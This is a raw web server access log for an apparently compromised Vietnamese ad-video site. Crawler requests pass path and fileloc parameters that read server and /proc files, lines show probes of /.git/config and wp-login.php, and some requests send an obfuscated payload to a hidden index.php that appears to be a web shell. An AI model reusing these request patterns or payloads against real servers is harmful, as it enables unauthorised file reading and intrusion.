51.77.43.178 - - [10/Nov/2025:01:02:38 +0000] "GET /video/quang-cao-3d-khuyen-mai-100.html?fileloc=//proc/659/patch_state&path=//proc/659 HTTP/1.1" 200 2608 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
216.73.216.50 - - [10/Nov/2025:01:02:38 +0000] "GET /our-works/tvc-caltex-havoline?path=%2F%2Fproc%2Fself%2Froot%2Fusr%2Flib%2Fx86_64-linux-gnu%2Fperl%2F5.30.0%2Fgnu HTTP/1.1" 200 3048 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
51.79.248.20 - - [10/Nov/2025:01:02:39 +0000] "GET /wp-content/upgrade-temp-backup/upgrade-temp-backup/index.php?ARRAY=7o2230223n313736323734303033392p2231223n22687474703n5p2s5p2s7n733634377631336o6s2r636p65726o742r70726s5p2s3s6p633q7068705s636s64655s6n6326743q313736323733363433392q3835386165346135316461383561333833363932613938366438626266643434222p2232223n226564386463313735326632393030396437393539336466386265323762333264222p2233223n226231616666386161376538363561333763653066363134633539323434666263222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231362q33382q35382q36312q37332q38362q3239227q HTTP/1.0" 504 167 "-" "-"
216.73.216.50 - - [10/Nov/2025:01:02:39 +0000] "GET /our-works/tvc-caltex-havoline?path=%2F%2Fusr%2Flib%2Fmodules%2F5.4.0-214-generic%2Fbuild%2Finclude%2Fconfig%2Fnet%2Fematch HTTP/1.1" 200 3305 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
51.77.43.178 - - [10/Nov/2025:01:02:40 +0000] "GET /video/quang-cao-3d-khuyen-mai-100.html?fileloc=//proc/659/smaps_rollup&path=//proc/659 HTTP/1.1" 200 2611 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
51.77.43.178 - - [10/Nov/2025:01:02:40 +0000] "GET /video/quang-cao-3d-khuyen-mai-100.html?fileloc=//proc/689/cgroup&path=//proc/689 HTTP/1.1" 200 2759 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
51.77.43.178 - - [10/Nov/2025:01:02:40 +0000] "GET /video/quang-cao-3d-khuyen-mai-100.html?fileloc=//proc/689/auxv&path=//proc/689 HTTP/1.1" 200 2605 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
35.173.38.202 - - [10/Nov/2025:01:02:41 +0000] "GET /our-works/phu-long-corporate-video/?fileloc=//bin/cpan&path=//bin HTTP/1.1" 200 6172 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
74.7.227.51 - - [10/Nov/2025:01:02:41 +0000] "GET /52akipl15864.html?path=/var/www/lamphim/data/php-bin HTTP/1.1" 200 2695 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
51.77.43.178 - - [10/Nov/2025:01:02:41 +0000] "GET /video/quang-cao-3d-khuyen-mai-100.html?fileloc=//proc/664/mem&path=//proc/664 HTTP/1.1" 200 2606 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
74.7.227.189 - - [10/Nov/2025:01:02:42 +0000] "GET /?path=//sys/bus/node/devices/node0/memory6/subsystem/devices/memory1/node0/cpu0/node0/cpu0 HTTP/1.1" 200 3441 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
51.77.43.178 - - [10/Nov/2025:01:02:42 +0000] "GET /video/quang-cao-3d-khuyen-mai-100.html?fileloc=//proc/664/oom_adj&path=//proc/664 HTTP/1.1" 200 2612 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
51.77.43.178 - - [10/Nov/2025:01:02:42 +0000] "GET /video/quang-cao-3d-khuyen-mai-100.html?fileloc=//proc/689/mounts&path=//proc/689 HTTP/1.1" 200 3350 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
51.77.43.178 - - [10/Nov/2025:01:02:42 +0000] "GET /video/quang-cao-3d-khuyen-mai-100.html?fileloc=//proc/661/schedstat&path=//proc/661 HTTP/1.1" 200 2629 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
216.73.216.50 - - [10/Nov/2025:01:02:43 +0000] "GET /our-works/tv-commercial/tvc-tet-sum-vay?fileloc=%2F%2Fproc%2Fthread-self%2Froot%2Flib%2Fpython3%2Fdist-packages%2Fclick%2Fdecorators.py&path=%2F%2Fproc%2Fthread-self%2Froot%2Flib%2Fpython3%2Fdist-packages%2Fclick HTTP/1.1" 200 5725 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
51.77.43.178 - - [10/Nov/2025:01:02:43 +0000] "GET /video/quang-cao-3d-khuyen-mai-100.html?fileloc=//proc/661/oom_adj&path=//proc/661 HTTP/1.1" 200 2610 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
35.174.141.243 - - [10/Nov/2025:01:02:43 +0000] "GET /our-works/tvc-relax-gaba/?path=//lib/dracut/modules.d/90bcache HTTP/1.1" 200 2964 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
216.73.216.50 - - [10/Nov/2025:01:02:44 +0000] "GET /our-works/tv-commercial/tvc-tet-sum-vay?path=%2F%2Fusr%2Fsrc%2Flinux-headers-5.4.0-216-generic%2Farch%2Fmips%2Falchemy%2Fcommon HTTP/1.1" 200 2998 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
114.119.143.51 - - [10/Nov/2025:01:02:44 +0000] "GET /?products=874642 HTTP/1.1" 200 4544 "https://lamphimquangcao.net/?sitemap201.xml" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
74.7.227.51 - - [10/Nov/2025:01:02:45 +0000] "GET /43xyx31473.html?path=/var/www/lamphim/data/tmp HTTP/1.1" 200 2969 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.189 - - [10/Nov/2025:01:02:45 +0000] "GET /?path=//sys/bus/node/devices/node0/memory5/subsystem/devices/memory6/node0/memory11/node0/memory13 HTTP/1.1" 200 3403 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
51.77.43.178 - - [10/Nov/2025:01:02:45 +0000] "GET /video/quang-cao-3d-khuyen-mai-100.html?fileloc=//proc/664/personality&path=//proc/664 HTTP/1.1" 200 2611 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
51.77.43.178 - - [10/Nov/2025:01:02:46 +0000] "GET /video/quang-cao-3d-khuyen-mai-100.html?fileloc=//proc/689/cgroup&path=//proc/689 HTTP/1.1" 200 2759 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
51.77.43.178 - - [10/Nov/2025:01:02:46 +0000] "GET /video/quang-cao-3d-khuyen-mai-100.html?fileloc=//proc/689/clear_refs&path=//proc/689 HTTP/1.1" 200 2609 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
216.73.216.50 - - [10/Nov/2025:01:02:46 +0000] "GET /our-works/tvc-caltex-havoline?path=%2F%2Fusr%2Fshare%2Ffastpanel2-phpmyadmin%2Fvendor%2Fphpmyadmin%2Fsql-parser%2Flocale%2Fvls HTTP/1.1" 200 3003 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
51.77.43.178 - - [10/Nov/2025:01:02:46 +0000] "GET /video/quang-cao-3d-khuyen-mai-100.html?fileloc=//proc/659/stack&path=//proc/659 HTTP/1.1" 200 2606 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
51.77.43.178 - - [10/Nov/2025:01:02:47 +0000] "GET /video/quang-cao-3d-khuyen-mai-100.html?fileloc=//proc/664/mountinfo&path=//proc/664 HTTP/1.1" 200 3758 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
51.77.43.178 - - [10/Nov/2025:01:02:47 +0000] "GET /video/quang-cao-3d-khuyen-mai-100.html?fileloc=//proc/689/mountstats&path=//proc/689 HTTP/1.1" 200 2608 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
54.204.62.163 - - [10/Nov/2025:01:02:48 +0000] "GET /our-works/tvc-caltex-havoline/?path=//usr/lib/systemd/user-environment-generators HTTP/1.1" 200 3035 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
51.77.43.178 - - [10/Nov/2025:01:02:48 +0000] "GET /video/quang-cao-3d-khuyen-mai-100.html?fileloc=//proc/659/personality&path=//proc/659 HTTP/1.1" 200 2610 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
74.7.227.51 - - [10/Nov/2025:01:02:49 +0000] "GET /62tki14224.html?path=/var/www/lamphim/data HTTP/1.1" 200 3277 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.189 - - [10/Nov/2025:01:02:49 +0000] "GET /?path=//sys/bus/node/devices/node0/memory6/subsystem/devices/memory1/node0/memory3/node0/cpu1 HTTP/1.1" 200 3483 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
51.77.43.178 - - [10/Nov/2025:01:02:49 +0000] "GET /video/quang-cao-3d-khuyen-mai-100.html?fileloc=//proc/661/sessionid&path=//proc/661 HTTP/1.1" 200 2616 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
216.73.216.50 - - [10/Nov/2025:01:02:50 +0000] "GET /our-works/tvc-caltex-havoline?fileloc=%2F%2Fproc%2F3264%2Froot%2Fusr%2Fshare%2Fperl%2F5.30%2Funicore%2Flib%2FNv%2F1_2.pl&path=%2F%2Fproc%2F3264%2Froot%2Fusr%2Fshare%2Fperl%2F5.30%2Funicore%2Flib%2FNv HTTP/1.1" 200 3104 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
51.77.43.178 - - [10/Nov/2025:01:02:50 +0000] "GET /video/quang-cao-3d-khuyen-mai-100.html?fileloc=//proc/664/oom_score&path=//proc/664 HTTP/1.1" 200 2613 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
51.77.43.178 - - [10/Nov/2025:01:02:51 +0000] "GET /video/quang-cao-3d-khuyen-mai-100.html?fileloc=//proc/689/clear_refs&path=//proc/689 HTTP/1.1" 200 2609 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
52.3.102.51 - - [10/Nov/2025:01:02:51 +0000] "GET /our-works/tvc-relax-gaba/?path=//lib/dracut/modules.d/90bcache HTTP/1.1" 200 2964 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
51.77.43.178 - - [10/Nov/2025:01:02:51 +0000] "GET /video/quang-cao-3d-khuyen-mai-100.html?fileloc=//proc/659/stat&path=//proc/659 HTTP/1.1" 200 2714 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
51.77.43.178 - - [10/Nov/2025:01:02:52 +0000] "GET /video/quang-cao-3d-khuyen-mai-100.html?fileloc=//proc/689/cmdline&path=//proc/689 HTTP/1.1" 200 2661 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
51.77.43.178 - - [10/Nov/2025:01:02:52 +0000] "GET /video/quang-cao-3d-khuyen-mai-100.html?fileloc=//proc/689/numa_maps&path=//proc/689 HTTP/1.1" 200 2608 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
51.77.43.178 - - [10/Nov/2025:01:02:52 +0000] "GET /video/quang-cao-3d-khuyen-mai-100.html?fileloc=//proc/661/oom_score&path=//proc/661 HTTP/1.1" 200 2612 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
74.7.227.51 - - [10/Nov/2025:01:02:53 +0000] "GET /203rxr8703.html?path=/var/www/lamphim/data/.wp-cli HTTP/1.1" 200 2952 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
51.77.43.178 - - [10/Nov/2025:01:02:53 +0000] "GET /video/quang-cao-3d-khuyen-mai-100.html?fileloc=//proc/664/mounts&path=//proc/664 HTTP/1.1" 200 3352 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
74.7.227.189 - - [10/Nov/2025:01:02:53 +0000] "GET /?path=//sys/bus/node/devices/node0/memory6/subsystem/devices/memory1/node0/memory7/node0/cpu1 HTTP/1.1" 200 3484 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
51.77.43.178 - - [10/Nov/2025:01:02:53 +0000] "GET /video/quang-cao-3d-khuyen-mai-100.html?fileloc=//proc/659/sched&path=//proc/659 HTTP/1.1" 200 3029 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
51.77.43.178 - - [10/Nov/2025:01:02:54 +0000] "GET /video/quang-cao-3d-khuyen-mai-100.html?fileloc=//proc/659/projid_map&path=//proc/659 HTTP/1.1" 200 2624 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
216.73.216.50 - - [10/Nov/2025:01:02:54 +0000] "GET /our-works/tvc-caltex-havoline?fileloc=%2F%2Fusr%2Flib%2Fmodules%2F5.4.0-216-generic%2Fkernel%2Fnet%2Fsched%2Fsch_sfb.ko&path=%2F%2Fusr%2Flib%2Fmodules%2F5.4.0-216-generic%2Fkernel%2Fnet%2Fsched HTTP/1.1" 200 2658 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
45.61.188.132 - - [10/Nov/2025:01:02:54 +0000] "GET /wp-login.php HTTP/1.1" 200 4544 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_5) AppleWebKit/537.77.4 (KHTML, like Gecko) Version/6.1.5 Safari/537.77.4"
3.94.157.25 - - [10/Nov/2025:01:02:55 +0000] "GET /our-works/tvc-bia-hello/?path=//sys/devices/LNXSYSTM:00/subsystem HTTP/1.1" 200 3142 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
51.77.43.178 - - [10/Nov/2025:01:02:55 +0000] "GET /video/quang-cao-3d-khuyen-mai-100.html?fileloc=//proc/689/cmdline&path=//proc/689 HTTP/1.1" 200 2661 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
74.7.227.51 - - [10/Nov/2025:01:02:55 +0000] "GET /150etr3606.html?path=/var/www/lamphim/data/php-bin HTTP/1.1" 200 2695 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.189 - - [10/Nov/2025:01:02:55 +0000] "GET /?path=//sys/bus/node/devices/node0/memory5/subsystem/devices/memory2/node0/memory11/node0 HTTP/1.1" 200 3951 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
216.73.216.50 - - [10/Nov/2025:01:02:56 +0000] "GET /our-works/tvc-caltex-havoline?fileloc=%2F%2Fproc%2Fself%2Froot%2Fsnap%2Fcore20%2F2669%2Flib%2Fpython3%2Fdist-packages%2Fchardet%2Fcharsetprober.py&path=%2F%2Fproc%2Fself%2Froot%2Fsnap%2Fcore20%2F2669%2Flib%2Fpython3%2Fdist-packages%2Fchardet HTTP/1.1" 200 4695 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
51.77.43.178 - - [10/Nov/2025:01:02:56 +0000] "GET /video/quang-cao-3d-khuyen-mai-100.html?fileloc=//proc/689/oom_adj&path=//proc/689 HTTP/1.1" 200 2610 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
51.77.43.178 - - [10/Nov/2025:01:02:56 +0000] "GET /video/quang-cao-3d-khuyen-mai-100.html?fileloc=//proc/664/mountstats&path=//proc/664 HTTP/1.1" 200 2610 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
51.77.43.178 - - [10/Nov/2025:01:02:57 +0000] "GET /video/quang-cao-3d-khuyen-mai-100.html?fileloc=//proc/689/comm&path=//proc/689 HTTP/1.1" 200 2610 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
94.26.88.18 - - [10/Nov/2025:01:02:57 +0000] "GET /.git/config HTTP/1.1" 200 4543 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
74.7.227.51 - - [10/Nov/2025:01:02:57 +0000] "GET /27atlle33909.html?path=/var/www/lamphim/data/email HTTP/1.1" 200 2691 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.189 - - [10/Nov/2025:01:02:58 +0000] "GET /?path=//sys/bus/node/devices/node0/memory5/subsystem/devices/memory0/node0/cpu1/node0/cpu0 HTTP/1.1" 200 3447 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
52.45.29.57 - - [10/Nov/2025:01:02:58 +0000] "GET /our-works/tvc-bia-hello/?path=//sys/devices/LNXSYSTM:00/subsystem HTTP/1.1" 200 3142 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
51.77.43.178 - - [10/Nov/2025:01:02:59 +0000] "GET /video/quang-cao-3d-khuyen-mai-100.html?fileloc=//proc/689/comm&path=//proc/689 HTTP/1.1" 200 2610 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
216.73.216.50 - - [10/Nov/2025:01:03:00 +0000] "GET /our-works/phim-viral-nestle?fileloc=%2F%2Fproc%2F3264%2Froot%2Flib%2Fmodules%2F5.4.0-216-generic%2Fbuild%2Finclude%2Flinux%2Fplatform_data%2Fmmc-omap.h&path=%2F%2Fproc%2F3264%2Froot%2Flib%2Fmodules%2F5.4.0-216-generic%2Fbuild%2Finclude%2Flinux%2Fplatform_data HTTP/1.1" 200 4031 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
51.77.43.178 - - [10/Nov/2025:01:03:00 +0000] "GET /video/quang-cao-3d-khuyen-mai-100.html?fileloc=//proc/661/oom_score_adj&path=//proc/661 HTTP/1.1" 200 2614 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
51.77.43.178 - - [10/Nov/2025:01:03:01 +0000] "GET /video/quang-cao-3d-khuyen-mai-100.html?fileloc=//proc/664/oom_score_adj&path=//proc/664 HTTP/1.1" 200 2616 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
51.77.43.178 - - [10/Nov/2025:01:03:01 +0000] "GET /video/quang-cao-3d-khuyen-mai-100.html?fileloc=//proc/689/oom_score&path=//proc/689 HTTP/1.1" 200 2612 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
74.7.227.51 - - [10/Nov/2025:01:03:02 +0000] "GET /27atlle33909.html?path=/var/www/lamphim/data/php-bin HTTP/1.1" 200 2695 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
51.77.43.178 - - [10/Nov/2025:01:03:03 +0000] "GET /video/quang-cao-3d-khuyen-mai-100.html?fileloc=//proc/659/statm&path=//proc/659 HTTP/1.1" 200 2625 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
74.7.227.189 - - [10/Nov/2025:01:03:03 +0000] "GET /?path=//sys/bus/node/devices/node0/memory1/subsystem/devices/memory6/node0/cpu1/node0/memory5 HTTP/1.1" 200 3410 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
51.77.43.178 - - [10/Nov/2025:01:03:04 +0000] "GET /video/quang-cao-3d-khuyen-mai-100.html?fileloc=//proc/664/numa_maps&path=//proc/664 HTTP/1.1" 200 2610 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
94.26.88.18 - - [10/Nov/2025:01:03:04 +0000] "GET /.git/config HTTP/1.1" 499 0 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
51.77.43.178 - - [10/Nov/2025:01:03:04 +0000] "GET /video/quang-cao-3d-khuyen-mai-100.html?fileloc=//proc/661/setgroups&path=//proc/661 HTTP/1.1" 200 2612 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
51.77.43.178 - - [10/Nov/2025:01:03:05 +0000] "GET /video/quang-cao-3d-khuyen-mai-100.html?fileloc=//proc/689/coredump_filter&path=//proc/689 HTTP/1.1" 200 2617 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
51.79.248.20 - - [10/Nov/2025:01:03:06 +0000] "GET /wp-content/upgrade-temp-backup/upgrade-temp-backup/index.php?ARRAY=7o2230223n313736323734303036362p2231223n22687474703n5p2s5p2s7n733634377631336o6s2r636p65726o742r70726s5p2s3s6p633q7068705s636s64655s6n6326743q313736323733363436362q6662383863633536663163383630323733386563656135633735356531373432222p2232223n226564386463313735326632393030396437393539336466386265323762333264222p2233223n226231616666386161376538363561333763653066363134633539323434666263222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231362q33382q35382q36312q37332q38362q3239227q HTTP/1.0" 504 167 "-" "-"
51.77.43.178 - - [10/Nov/2025:01:03:06 +0000] "GET /video/quang-cao-3d-khuyen-mai-100.html?fileloc=//proc/664/projid_map&path=//proc/664 HTTP/1.1" 200 2626 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
18.215.49.176 - - [10/Nov/2025:01:03:06 +0000] "GET /our-works/intracom-riverside/?fileloc=//var/log/apport.log&path=//var/log HTTP/1.1" 200 2609 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
51.77.43.178 - - [10/Nov/2025:01:03:07 +0000] "GET /video/quang-cao-3d-khuyen-mai-100.html?fileloc=//proc/659/sched&path=//proc/659 HTTP/1.1" 200 3032 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
51.77.43.178 - - [10/Nov/2025:01:03:07 +0000] "GET /video/quang-cao-3d-khuyen-mai-100.html?fileloc=//proc/659/schedstat&path=//proc/659 HTTP/1.1" 200 2632 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
216.73.216.50 - - [10/Nov/2025:01:03:07 +0000] "GET /our-works/tvc-caltex-havoline?path=%2F%2Fproc%2Fself%2Froot%2Fproc%2Fself%2Froot%2Fusr%2Fsrc%2Flinux-headers-5.4.0-216-generic%2Ffs%2Fromfs HTTP/1.1" 200 3060 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
51.77.43.178 - - [10/Nov/2025:01:03:07 +0000] "GET /video/quang-cao-3d-khuyen-mai-100.html?fileloc=//proc/689/coredump_filter&path=//proc/689 HTTP/1.1" 200 2617 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
74.7.227.51 - - [10/Nov/2025:01:03:08 +0000] "GET /62tki14224.html?path=/var/www/lamphim/data/tmp HTTP/1.1" 200 2969 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
51.77.43.178 - - [10/Nov/2025:01:03:08 +0000] "GET /video/quang-cao-3d-khuyen-mai-100.html?fileloc=//proc/689/oom_score_adj&path=//proc/689 HTTP/1.1" 200 2614 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
74.7.227.189 - - [10/Nov/2025:01:03:08 +0000] "GET /?path=//sys/bus/node/devices/node0/memory5/subsystem/devices/memory6/node0/memory2/node0/cpu0 HTTP/1.1" 200 3445 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
52.45.15.233 - - [10/Nov/2025:01:03:09 +0000] "GET /our-works/tvc-kimino/?fileloc=//lib/python3/dist-packages/debconf.py&path=//lib/python3/dist-packages HTTP/1.1" 200 5276 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
51.77.43.178 - - [10/Nov/2025:01:03:09 +0000] "GET /video/quang-cao-3d-khuyen-mai-100.html?fileloc=//proc/661/pagemap&path=//proc/661 HTTP/1.1" 200 2607 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
51.77.43.178 - - [10/Nov/2025:01:03:09 +0000] "GET /video/quang-cao-3d-khuyen-mai-100.html?fileloc=//proc/664/pagemap&path=//proc/664 HTTP/1.1" 200 2609 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
51.77.43.178 - - [10/Nov/2025:01:03:10 +0000] "GET /video/quang-cao-3d-khuyen-mai-100.html?fileloc=//proc/664/oom_adj&path=//proc/664 HTTP/1.1" 200 2612 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
51.77.43.178 - - [10/Nov/2025:01:03:10 +0000] "GET /video/quang-cao-3d-khuyen-mai-100.html?fileloc=//proc/689/cpuset&path=//proc/689 HTTP/1.1" 200 2608 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
98.83.72.38 - - [10/Nov/2025:01:03:11 +0000] "GET /our-works/tvc-kimino/?path=//sys/devices/msr/power HTTP/1.1" 200 3240 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
51.77.43.178 - - [10/Nov/2025:01:03:11 +0000] "GET /video/quang-cao-3d-khuyen-mai-100.html?fileloc=//proc/659/status&path=//proc/659 HTTP/1.1" 200 3086 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
74.7.227.51 - - [10/Nov/2025:01:03:11 +0000] "GET /62tki14224.html?path=/var/www/lamphim/data/php-bin HTTP/1.1" 200 2695 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
216.73.216.50 - - [10/Nov/2025:01:03:11 +0000] "GET /our-works/tvc-caltex-havoline?path=%2F%2Fproc%2Fthread-self%2Froot%2Fusr%2Fsrc%2Flinux-headers-5.4.0-214-generic%2Fnet%2Fllc HTTP/1.1" 200 3052 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
